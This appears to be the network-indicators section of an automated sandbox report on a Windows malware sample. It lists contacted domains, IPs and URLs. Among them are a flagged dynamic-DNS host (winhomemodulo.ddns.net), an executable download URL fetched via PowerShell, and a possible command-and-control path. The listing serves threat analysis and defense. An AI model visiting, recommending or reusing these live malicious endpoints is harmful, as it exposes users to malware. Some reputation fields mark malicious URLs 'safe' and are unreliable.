https://www.google.com.br/xjs/_/ss/k=xjs.hd.uXKqy-U68Tg.L.B1.O/am=AEwBAAAAAACAAQAAAAAAAAAAAAAAAACAAABAAAAAAAAACgCfBDAEADYEAAAAIABAAAAAAAAAKAAAAMAEAAAEAJAAEAAQEAAAAACAEEAAQAAIUASQACgIMgABAAARAAOGARAVAAwBAAAAAQQAAAAA4EYAAgQAgBAAAXgAAQAE6AABMAAIAABAAAMYCAAAAAAAAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAgAKAAAAAAAAAAAAAAAAAAAACA/d=1/ed=1/br=1/rs=ACT90oGsq-SoWBQak-dlJ1cJ1f6Qo33Eng/m=cdos,hsm,jsa,mb4ZUb,d,csi,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl	0%	Avira URL Cloud	safe
https://www.google.com.br/favicon.ico	0%	Avira URL Cloud	safe
http://fontawesome.iohttp://fontawesome.iohttp://fontawesome.io/license/http://fontawesome.io/licens	0%	Avira URL Cloud	safe
http://www.borland.com/rootpart.xml	0%	Avira URL Cloud	safe
https://www.google.com.br/gen_204?atyp=i&ei=J9-GZvKjJq-Jxc8Pk7aqmA0&dt19=2&prm23=0&zx=1720114987066&opi=89978449	0%	Avira URL Cloud	safe
https://www.google.com.br/log?format	0%	Avira URL Cloud	safe
https://www.google.com.br/xjs/_/ss/k=xjs.hd.uXKqy-U68Tg.L.B1.O/am=AEwBAAAAAACAAQAAAAAAAAAAAAAAAACAAABAAAAAAAAACgCfBDAEADYEAAAAIABAAAAAAAAAKAAAAMAEAAAEAJAAEAAQEAAAAACAEEAAQAAIUASQACgIMgABAAARAAOGARAVAAwBAAAAAQQAAAAA4EYAAgQAgBAAAXgAAQAE6AABMAAIAABAAAMYCAAAAAAAAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAgAKAAAAAAAAAAAAAAAAAAAACA/d=0/br=1/rs=ACT90oGsq-SoWBQak-dlJ1cJ1f6Qo33Eng/m=syj3,syka?xjs=s4	0%	Avira URL Cloud	safe
http://crl.ver)	0%	Avira URL Cloud	safe
https://www.google.com.br/xjs/_/js/k=xjs.hd.en.O0yDbPOOl4Q.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAABACKAAAAAUAAAAAAAAAAAAAIAAIQBAKAAAAuAAEAEBAIAAAIBAEIBHmQAAEAAmAAAAAAQAACgIQAABAAAQAAAAAAAUAAAAAAAAAAAAAAAMIIAAAAAAAAAAAAAAAAAA6AAAAAACIEAQAAMYCAAABAAAAKAHAMEBMEhBAAAAAAAAAAAAAAAAApAgmAsJKAggAAAAAAAAAAAAAAAAACnpxMIG/d=0/dg=0/br=1/rs=ACT90oEbz1QcJ7_--YgKEGx4ivY8shu-hw/m=sytl,sytk,VsqSCc,sy1b6,P10Owf,sy19v,sy19t,syq9,gSZvdb,syw5,syw4,WlNQGd,sywi,sywg,nabPbb,syqe,syqb,syqa,syq8,DPreE,syvz,syvx,syj3,syka,CnSW2d,kQvlef,sywh,fXO0xe?xjs=s4	0%	Avira URL Cloud	safe
https://www.google.com.br/gen_204?atyp=i&ct=psnt&cad=&nt=navigate&ei=J9-GZvKjJq-Jxc8Pk7aqmA0&zx=1720114990613&opi=89978449	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
https://www.google.com.br/gen_204?atyp=csi&ei=LN-GZtfpG5yri-gP-v6IsAc&s=async&astyp=hpba&ima=0&imn=0&mem=ujhs.6,tjhs.10,jhsl.2173,dm.8&nv=ne.1,feid.62fc9447-4556-440a-8b9a-5cf3e8b62e83&hp=&rt=ttfb.1025,st.1027,bs.27,aaft.1027,acrt.1028,art.1028&zx=1720114988090&opi=89978449	0%	Avira URL Cloud	safe
https://www.google.com.br/xjs/_/js/k=xjs.hd.en.O0yDbPOOl4Q.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAABACKAAAAAUAAAAAAAAAAAAAIAAIQBAKAAAAuAAEAEBAIAAAIBAEIBHmQAAEAAmAAAAAAQAACgIQAABAAAQAAAAAAAUAAAAAAAAAAAAAAAMIIAAAAAAAAAAAAAAAAAA6AAAAAACIEAQAAMYCAAABAAAAKAHAMEBMEhBAAAAAAAAAAAAAAAAApAgmAsJKAggAAAAAAAAAAAAAAAAACnpxMIG/d=0/dg=0/br=1/rs=ACT90oEbz1QcJ7_--YgKEGx4ivY8shu-hw/m=syf6,aLUfP?xjs=s4	0%	Avira URL Cloud	safe
https://www.google.com.br/gen_204?s=webhp&t=aft&atyp=csi&ei=J9-GZvKjJq-Jxc8Pk7aqmA0&rt=wsrt.3901,aft.1379,afti.1379,cbt.97,hst.96,prt.1047&imn=11&ima=2&imad=0&imac=0&wh=907&aftie=NF&aft=1&aftp=907&opi=89978449	0%	Avira URL Cloud	safe
https://play.google.com/log?hasfast=true&authuser=0&format=json	0%	Avira URL Cloud	safe
https://play.google.com/log?format=json&hasfast=true	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/wsdl/soap/#	0%	Avira URL Cloud	safe
http://fontawesome.io/license/	0%	Avira URL Cloud	safe
http://digitalbush.com/projects/masked-input-plugin/#license)	0%	Avira URL Cloud	safe
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96	0%	Avira URL Cloud	safe
https://www.google.com.br/logos/doodles/2024/fourth-of-july-2024-6753651837110246-law.gif	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/wsdl/http/	0%	Avira URL Cloud	safe
http://tempuri.org/U	0%	Avira URL Cloud	safe
https://www.google.com.br/client_204?cs=1&opi=89978449	0%	Avira URL Cloud	safe
https://www.google.com.br/gen_204?atyp=csi&ei=J9-GZvKjJq-Jxc8Pk7aqmA0&s=promo&rt=hpbas.3784,hpbarr.1030&zx=1720114988091&opi=89978449	0%	Avira URL Cloud	safe
https://www.advancedinstaller.com	0%	Avira URL Cloud	safe
https://teste.me	0%	Avira URL Cloud	safe
https://teste.meuly.onDfo	0%	Avira URL Cloud	safe
http://teste.meuly.online	0%	Avira URL Cloud	safe
https://www.google.com.br/xjs/_/js/md=10/k=xjs.hd.en.O0yDbPOOl4Q.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAABACKAAAAAUAAAAAAAAAAAAAIAAIQBAKAAAAuAAEAEBAIAAAIBAEIBHmQAAEAAmAAAAAAQAACgIQAABAAAQAAAAAAAUAAAAAAAAAAAAAAAMIIAAAAAAAAAAAAAAAAAA6AAAAAACIEAQAAMYCAAABAAAAKAHAMEBMEhBAAAAAAAAAAAAAAAAApAgmAsJKAggAAAAAAAAAAAAAAAAACnpxMIG/rs=ACT90oEbz1QcJ7_--YgKEGx4ivY8shu-hw	0%	Avira URL Cloud	safe
https://www.google.com.br/async/hpba?vet=10ahUKEwiy08nU942HAxWvRPEDHRObCtMQj-0KCBY..i&ei=J9-GZvKjJq-Jxc8Pk7aqmA0&opi=89978449&yv=3&cs=0&async=isImageHp:false,eventId:J9-GZvKjJq-Jxc8Pk7aqmA0,endpoint:overlay,stick:,_basejs:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en.O0yDbPOOl4Q.O%2Fam%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAABACKAAAAAUAAAAAAAAAAAAAIAAIQBAKAAAAuAAEAEBAIAAAIBAEIBHmQAAEAAmAAAAAAQAACgIQAABAAAQAAAAAAAUAAAAAAAAAAAAAAAMIIAAAAAAAAAAAAAAAAAA6AAAAAACIEAQAAMYCAAABAAAAKAHAMEBMEhBAAAAAAAAAAAAAAAAApAgmAsJKAggAAAAAAAAAAAAAAAAACnpxMIG%2Fdg%3D0%2Fbr%3D1%2Frs%3DACT90oEbz1QcJ7_--YgKEGx4ivY8shu-hw,_basecss:%2Fxjs%2F_%2Fss%2Fk%3Dxjs.hd.uXKqy-U68Tg.L.B1.O%2Fam%3DAEwBAAAAAACAAQAAAAAAAAAAAAAAAACAAABAAAAAAAAACgCfBDAEADYEAAAAIABAAAAAAAAAKAAAAMAEAAAEAJAAEAAQEAAAAACAEEAAQAAIUASQACgIMgABAAARAAOGARAVAAwBAAAAAQQAAAAA4EYAAgQAgBAAAXgAAQAE6AABMAAIAABAAAMYCAAAAAAAAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAgAKAAAAAAAAAAAAAAAAAAAACA%2Fbr%3D1%2Frs%3DACT90oGsq-SoWBQak-dlJ1cJ1f6Qo33Eng,_basecomb:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en.O0yDbPOOl4Q.O%2Fck%3Dxjs.hd.uXKqy-U68Tg.L.B1.O%2Fam%3DAEwBAAAAAACAAQAAAAAAAAAAAAAAAACAAABAAAAAAABACqCfBDAUADYEAAAAIABAAIAAIQBAKAAAAuAEEAEFAJAAEIBQEIBHmQCAEEAmQAAIUASQACgIcgABAAARAAOGARAVAAwBAAAAAQQAAAAM4MYAAgQAgBAAAXgAAQAE6AABMAAKIEBQAAMYCAAABAAAAKAHAMEBMEhBAAAAAAAAAAAAAAAAApAgmAsJKAggAAAAAAAAAAAAAAAAACnpxMIG%2Fd%3D1%2Fed%3D1%2Fdg%3D0%2Fbr%3D1%2Fujg%3D1%2Frs%3DACT90oHrqdFD_oFp_AmAyXzeY67GUHO6TQ,_fmt:prog,_id:a3JU5b	0%	Avira URL Cloud	safe
https://www.google.com.br/gen_204?atyp=i&ei=J9-GZvKjJq-Jxc8Pk7aqmA0&ct=slh&v=t1&im=M&m=HV&pv=0.9092164420469366&me=1:1720114984323,V,0,0,1034,870:0,B,870:0,N,1,J9-GZvKjJq-Jxc8Pk7aqmA0:0,R,1,1,0,0,1034,870:0,R,1,4,267,334,500,16:2747,x:125,h,1,1,i:79,h,1,4,i:108,h,1,4,o:1007,h,1,1,o:1032,e,B&zx=1720114989421&opi=89978449	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/wsdl/mime/	0%	Avira URL Cloud	safe
https://www.google.com.br/gen_204?s=webhp&t=cap&atyp=csi&ei=J9-GZvKjJq-Jxc8Pk7aqmA0&rt=wsrt.3901,cbt.97,hst.96&opi=89978449	0%	Avira URL Cloud	safe
https://www.google.com.br/gen_204?atyp=csi&ei=J9-GZvKjJq-Jxc8Pk7aqmA0&s=promo&rt=hpbas.3784&zx=1720114987061&opi=89978449	0%	Avira URL Cloud	safe
https://www.google.com.br/log?format=json&hasfast=true&authuser=0	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
teste.meuly.online	23.111.168.85	true	false	unknown
winhomemodulo.ddns.net	64.226.97.61	true	true	unknown
google.com.br	142.250.185.227	true	false	unknown
www3.l.google.com	142.250.185.174	true	false	unknown
plus.l.google.com	172.217.16.142	true	false	unknown
play.google.com	172.217.16.206	true	false	unknown
www.google.com.br	142.250.185.99	true	false	unknown
www.google.com	142.250.74.196	true	false	unknown
ogs.google.com.br	unknown	unknown	true	unknown
apis.google.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.google.com.br/client_204?atyp=i&biw=1034&bih=870&ei=J9-GZvKjJq-Jxc8Pk7aqmA0&opi=89978449	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/hpp/ic_wahlberg_product_core_48.png8.png	false	Avira URL Cloud: safe	unknown
https://www.google.com.br/images/searchbox/desktop_searchbox_sprites318_hr.webp	false	Avira URL Cloud: safe	unknown
https://ogs.google.com.br/widget/app/so?awwd=1&gm3=1&origin=https%3A%2F%2Fwww.google.com.br&cn=app&pid=1&spid=538&hl=en	false		unknown
http://winhomemodulo.ddns.net/w2/	false	Avira URL Cloud: safe	unknown
https://www.google.com.br/gen_204?atyp=csi&ei=J9-GZvKjJq-Jxc8Pk7aqmA0&s=webhp&t=all&imn=11&ima=2&imad=0&imac=0&wh=907&aftie=NF&aft=1&aftp=907&adh=&ime=1&imeae=0&imeap=0&imex=1&imeh=0&imeha=0&imehb=0&imea=0&imeb=0&imel=0&imed=0&imeeb=0&scp=0&cb=205653&ucb=205653&mem=ujhs.6,tjhs.10,jhsl.2173,dm.8&nv=ne.1,feid.62fc9447-4556-440a-8b9a-5cf3e8b62e83&net=dl.1450,ect.3g,rtt.300&hp=&sys=hc.4&p=bs.true&rt=hst.96,cbt.97,prt.1047,afti.1379,aftip.1045,aft.1379,aftqf.1380,xjses.1934,xjsee.1982,xjs.1982,lcp.1407,fcp.1108,wsrt.3901,cst.678,dnst.10,rqst.728,rspt.373,sslt.678,rqstt.3546,unt.2855,cstt.2868,dit.4986&zx=1720114985264&opi=89978449	false	Avira URL Cloud: safe	unknown
https://teste.meuly.online/xxx/home21.exe	false	Avira URL Cloud: safe	unknown
https://www.google.com.br/complete/search?q&cp=0&client=gws-wiz&xssi=t&gs_pcrt=2&hl=en&authuser=0&psi=J9-GZvKjJq-Jxc8Pk7aqmA0.1720114985301&dpr=1&nolsbt=1	false	Avira URL Cloud: safe	unknown
https://www.google.com.br/xjs/_/ss/k=xjs.hd.uXKqy-U68Tg.L.B1.O/am=AEwBAAAAAACAAQAAAAAAAAAAAAAAAACAAABAAAAAAAAACgCfBDAEADYEAAAAIABAAAAAAAAAKAAAAMAEAAAEAJAAEAAQEAAAAACAEEAAQAAIUASQACgIMgABAAARAAOGARAVAAwBAAAAAQQAAAAA4EYAAgQAgBAAAXgAAQAE6AABMAAIAABAAAMYCAAAAAAAAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAgAKAAAAAAAAAAAAAAAAAAAACA/d=1/ed=1/br=1/rs=ACT90oGsq-SoWBQak-dlJ1cJ1f6Qo33Eng/m=cdos,hsm,jsa,mb4ZUb,d,csi,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl	false	Avira URL Cloud: safe	unknown
https://www.google.com.br/xjs/_/js/k=xjs.hd.en.O0yDbPOOl4Q.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAABACKAAAAAUAAAAAAAAAAAAAIAAIQBAKAAAAuAAEAEBAIAAAIBAEIBHmQAAEAAmAAAAAAQAACgIQAABAAAQAAAAAAAUAAAAAAAAAAAAAAAMIIAAAAAAAAAAAAAAAAAA6AAAAAACIEAQAAMYCAAABAAAAKAHAMEBMEhBAAAAAAAAAAAAAAAAApAgmAsJKAggAAAAAAAAAAAAAAAAACnpxMIG/d=0/dg=0/br=1/rs=ACT90oEbz1QcJ7_--YgKEGx4ivY8shu-hw/m=kMFpHd,sy8x,bm51tf?xjs=s4	false	Avira URL Cloud: safe	unknown
https://ogs.google.com.br/widget/callout?prid=19037050&pgid=19037049&puid=9ceb59a7585b55bd&cce=1&dc=1&origin=https%3A%2F%2Fwww.google.com.br&cn=callout&pid=1&spid=538&hl=en	false		unknown
https://www.google.com.br/favicon.ico	false	Avira URL Cloud: safe	unknown
https://www.google.com.br/gen_204?atyp=i&ei=J9-GZvKjJq-Jxc8Pk7aqmA0&dt19=2&prm23=0&zx=1720114987066&opi=89978449	false	Avira URL Cloud: safe	unknown
https://www.google.com.br/xjs/_/ss/k=xjs.hd.uXKqy-U68Tg.L.B1.O/am=AEwBAAAAAACAAQAAAAAAAAAAAAAAAACAAABAAAAAAAAACgCfBDAEADYEAAAAIABAAAAAAAAAKAAAAMAEAAAEAJAAEAAQEAAAAACAEEAAQAAIUASQACgIMgABAAARAAOGARAVAAwBAAAAAQQAAAAA4EYAAgQAgBAAAXgAAQAE6AABMAAIAABAAAMYCAAAAAAAAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAgAKAAAAAAAAAAAAAAAAAAAACA/d=0/br=1/rs=ACT90oGsq-SoWBQak-dlJ1cJ1f6Qo33Eng/m=syj3,syka?xjs=s4	false	Avira URL Cloud: safe	unknown
https://www.google.com.br/xjs/_/js/k=xjs.hd.en.O0yDbPOOl4Q.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAABACKAAAAAUAAAAAAAAAAAAAIAAIQBAKAAAAuAAEAEBAIAAAIBAEIBHmQAAEAAmAAAAAAQAACgIQAABAAAQAAAAAAAUAAAAAAAAAAAAAAAMIIAAAAAAAAAAAAAAAAAA6AAAAAACIEAQAAMYCAAABAAAAKAHAMEBMEhBAAAAAAAAAAAAAAAAApAgmAsJKAggAAAAAAAAAAAAAAAAACnpxMIG/d=0/dg=0/br=1/rs=ACT90oEbz1QcJ7_--YgKEGx4ivY8shu-hw/m=sytl,sytk,VsqSCc,sy1b6,P10Owf,sy19v,sy19t,syq9,gSZvdb,syw5,syw4,WlNQGd,sywi,sywg,nabPbb,syqe,syqb,syqa,syq8,DPreE,syvz,syvx,syj3,syka,CnSW2d,kQvlef,sywh,fXO0xe?xjs=s4	false	Avira URL Cloud: safe	unknown
https://www.google.com.br/gen_204?atyp=csi&ei=LN-GZtfpG5yri-gP-v6IsAc&s=async&astyp=hpba&ima=0&imn=0&mem=ujhs.6,tjhs.10,jhsl.2173,dm.8&nv=ne.1,feid.62fc9447-4556-440a-8b9a-5cf3e8b62e83&hp=&rt=ttfb.1025,st.1027,bs.27,aaft.1027,acrt.1028,art.1028&zx=1720114988090&opi=89978449	false	Avira URL Cloud: safe	unknown
https://www.google.com.br/gen_204?atyp=i&ct=psnt&cad=&nt=navigate&ei=J9-GZvKjJq-Jxc8Pk7aqmA0&zx=1720114990613&opi=89978449	false	Avira URL Cloud: safe	unknown
https://www.google.com.br/gen_204?s=webhp&t=aft&atyp=csi&ei=J9-GZvKjJq-Jxc8Pk7aqmA0&rt=wsrt.3901,aft.1379,afti.1379,cbt.97,hst.96,prt.1047&imn=11&ima=2&imad=0&imac=0&wh=907&aftie=NF&aft=1&aftp=907&opi=89978449	false	Avira URL Cloud: safe	unknown
https://www.google.com.br/xjs/_/js/k=xjs.hd.en.O0yDbPOOl4Q.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAABACKAAAAAUAAAAAAAAAAAAAIAAIQBAKAAAAuAAEAEBAIAAAIBAEIBHmQAAEAAmAAAAAAQAACgIQAABAAAQAAAAAAAUAAAAAAAAAAAAAAAMIIAAAAAAAAAAAAAAAAAA6AAAAAACIEAQAAMYCAAABAAAAKAHAMEBMEhBAAAAAAAAAAAAAAAAApAgmAsJKAggAAAAAAAAAAAAAAAAACnpxMIG/d=0/dg=0/br=1/rs=ACT90oEbz1QcJ7_--YgKEGx4ivY8shu-hw/m=syf6,aLUfP?xjs=s4	false	Avira URL Cloud: safe	unknown
https://play.google.com/log?hasfast=true&authuser=0&format=json	false	Avira URL Cloud: safe	unknown
https://play.google.com/log?format=json&hasfast=true	false	Avira URL Cloud: safe	unknown
https://www.google.com.br/	false		unknown
https://www.google.com.br/logos/doodles/2024/fourth-of-july-2024-6753651837110246-law.gif	false	Avira URL Cloud: safe	unknown
https://www.google.com.br/gen_204?atyp=csi&ei=J9-GZvKjJq-Jxc8Pk7aqmA0&s=promo&rt=hpbas.3784,hpbarr.1030&zx=1720114988091&opi=89978449	false	Avira URL Cloud: safe	unknown
https://www.google.com.br/client_204?cs=1&opi=89978449	false	Avira URL Cloud: safe	unknown
https://www.google.com.br/async/hpba?vet=10ahUKEwiy08nU942HAxWvRPEDHRObCtMQj-0KCBY..i&ei=J9-GZvKjJq-Jxc8Pk7aqmA0&opi=89978449&yv=3&cs=0&async=isImageHp:false,eventId:J9-GZvKjJq-Jxc8Pk7aqmA0,endpoint:overlay,stick:,_basejs:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en.O0yDbPOOl4Q.O%2Fam%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAABACKAAAAAUAAAAAAAAAAAAAIAAIQBAKAAAAuAAEAEBAIAAAIBAEIBHmQAAEAAmAAAAAAQAACgIQAABAAAQAAAAAAAUAAAAAAAAAAAAAAAMIIAAAAAAAAAAAAAAAAAA6AAAAAACIEAQAAMYCAAABAAAAKAHAMEBMEhBAAAAAAAAAAAAAAAAApAgmAsJKAggAAAAAAAAAAAAAAAAACnpxMIG%2Fdg%3D0%2Fbr%3D1%2Frs%3DACT90oEbz1QcJ7_--YgKEGx4ivY8shu-hw,_basecss:%2Fxjs%2F_%2Fss%2Fk%3Dxjs.hd.uXKqy-U68Tg.L.B1.O%2Fam%3DAEwBAAAAAACAAQAAAAAAAAAAAAAAAACAAABAAAAAAAAACgCfBDAEADYEAAAAIABAAAAAAAAAKAAAAMAEAAAEAJAAEAAQEAAAAACAEEAAQAAIUASQACgIMgABAAARAAOGARAVAAwBAAAAAQQAAAAA4EYAAgQAgBAAAXgAAQAE6AABMAAIAABAAAMYCAAAAAAAAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAgAKAAAAAAAAAAAAAAAAAAAACA%2Fbr%3D1%2Frs%3DACT90oGsq-SoWBQak-dlJ1cJ1f6Qo33Eng,_basecomb:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en.O0yDbPOOl4Q.O%2Fck%3Dxjs.hd.uXKqy-U68Tg.L.B1.O%2Fam%3DAEwBAAAAAACAAQAAAAAAAAAAAAAAAACAAABAAAAAAABACqCfBDAUADYEAAAAIABAAIAAIQBAKAAAAuAEEAEFAJAAEIBQEIBHmQCAEEAmQAAIUASQACgIcgABAAARAAOGARAVAAwBAAAAAQQAAAAM4MYAAgQAgBAAAXgAAQAE6AABMAAKIEBQAAMYCAAABAAAAKAHAMEBMEhBAAAAAAAAAAAAAAAAApAgmAsJKAggAAAAAAAAAAAAAAAAACnpxMIG%2Fd%3D1%2Fed%3D1%2Fdg%3D0%2Fbr%3D1%2Fujg%3D1%2Frs%3DACT90oHrqdFD_oFp_AmAyXzeY67GUHO6TQ,_fmt:prog,_id:a3JU5b	false	Avira URL Cloud: safe	unknown
https://www.google.com.br/xjs/_/js/md=10/k=xjs.hd.en.O0yDbPOOl4Q.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAABACKAAAAAUAAAAAAAAAAAAAIAAIQBAKAAAAuAAEAEBAIAAAIBAEIBHmQAAEAAmAAAAAAQAACgIQAABAAAQAAAAAAAUAAAAAAAAAAAAAAAMIIAAAAAAAAAAAAAAAAAA6AAAAAACIEAQAAMYCAAABAAAAKAHAMEBMEhBAAAAAAAAAAAAAAAAApAgmAsJKAggAAAAAAAAAAAAAAAAACnpxMIG/rs=ACT90oEbz1QcJ7_--YgKEGx4ivY8shu-hw	false	Avira URL Cloud: safe	unknown
https://www.google.com.br/gen_204?atyp=i&ei=J9-GZvKjJq-Jxc8Pk7aqmA0&ct=slh&v=t1&im=M&m=HV&pv=0.9092164420469366&me=1:1720114984323,V,0,0,1034,870:0,B,870:0,N,1,J9-GZvKjJq-Jxc8Pk7aqmA0:0,R,1,1,0,0,1034,870:0,R,1,4,267,334,500,16:2747,x:125,h,1,1,i:79,h,1,4,i:108,h,1,4,o:1007,h,1,1,o:1032,e,B&zx=1720114989421&opi=89978449	false	Avira URL Cloud: safe	unknown
https://www.google.com.br/gen_204?s=webhp&t=cap&atyp=csi&ei=J9-GZvKjJq-Jxc8Pk7aqmA0&rt=wsrt.3901,cbt.97,hst.96&opi=89978449	false	Avira URL Cloud: safe	unknown
https://www.google.com.br/log?format=json&hasfast=true&authuser=0	false	Avira URL Cloud: safe	unknown
https://www.google.com.br/gen_204?atyp=csi&ei=J9-GZvKjJq-Jxc8Pk7aqmA0&s=promo&rt=hpbas.3784&zx=1720114987061&opi=89978449	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://aka.ms/pscore6lBzq	powershell.exe, 00000003.00000002.1859009151.0000000004D21000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://fontawesome.io	home21.exe, 00000006.00000003.1869307874.0000000009DF0000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000003.00000002.1861035297.0000000005D8C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://teste.meuly.online	powershell.exe, 00000003.00000002.1859009151.0000000004E76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1859009151.0000000005386000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	home21.exe, 00000006.00000003.1861648679.0000000009E0B000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://g.live.com/odclientsettings/ProdV2.C:	edb.log.11.dr, qmgr.db.11.dr	false	Avira URL Cloud: safe	unknown
http://tempuri.org/	home21.exe, 00000006.00000003.1861648679.000000000A80B000.00000004.00001000.00020000.00000000.sdmp, home21.exe, 00000006.00000003.1869307874.000000000A3F2000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ogs.google.com.br/	chromecache_110.12.dr	false	Avira URL Cloud: safe	unknown
http://www.indyproject.org/	home21.exe, 00000006.00000003.1862753592.0000000008060000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://teste.meulLRzq	powershell.exe, 00000003.00000002.1859009151.0000000005343000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/soap12/SV	home21.exe, 00000006.00000003.1861648679.0000000009E0B000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/soap/	home21.exe, 00000006.00000003.1861648679.0000000009E0B000.00000004.00001000.00020000.00000000.sdmp, home21.exe, 00000006.00000003.1861648679.000000000A80B000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/Prod.C:	edb.log.11.dr, qmgr.db.11.dr	false	Avira URL Cloud: safe	unknown
https://ogs.google.com.br/widget/app/so	chromecache_110.12.dr	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/ProdV2	edb.log.11.dr, qmgr.db.11.dr	false	Avira URL Cloud: safe	unknown
http://www.borland.com/namespaces/Types	home21.exe, 00000006.00000003.1862753592.0000000008060000.00000004.00001000.00020000.00000000.sdmp, home21.exe, 00000006.00000003.1861648679.000000000A80B000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/http	home21.exe, 00000006.00000003.1861648679.000000000A80B000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000003.00000002.1861035297.0000000005D8C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.1861035297.0000000005D8C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://teste.meull	powershell.exe, 00000003.00000002.1859009151.0000000005343000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000003.00000002.1859009151.0000000004D21000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 0000000B.00000003.3490855209.000001A07E2C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.dr	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.1861035297.0000000005D8C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.borland.com/namespaces/Types-IWSDLPublish	home21.exe, 00000006.00000003.1862753592.0000000008060000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://fontawesome.iohttp://fontawesome.iohttp://fontawesome.io/license/http://fontawesome.io/licens	home21.exe, 00000006.00000003.1869307874.0000000009DF0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000003.00000002.1859009151.0000000004E76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1862144445.00000000074B7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	home21.exe, 00000006.00000003.1861648679.0000000009E0B000.00000004.00001000.00020000.00000000.sdmp, home21.exe, 00000006.00000003.1861648679.000000000A80B000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000003.00000002.1859009151.0000000004E76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1862144445.00000000074B7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://go.micro	powershell.exe, 00000003.00000002.1859009151.0000000005545000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://winhomemodulo.ddns.net/w2/openU	home21.exe, 00000006.00000003.1861648679.0000000009E0B000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.borland.com/rootpart.xml	home21.exe, 00000006.00000003.1861648679.000000000A80B000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000003.00000002.1861035297.0000000005D8C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
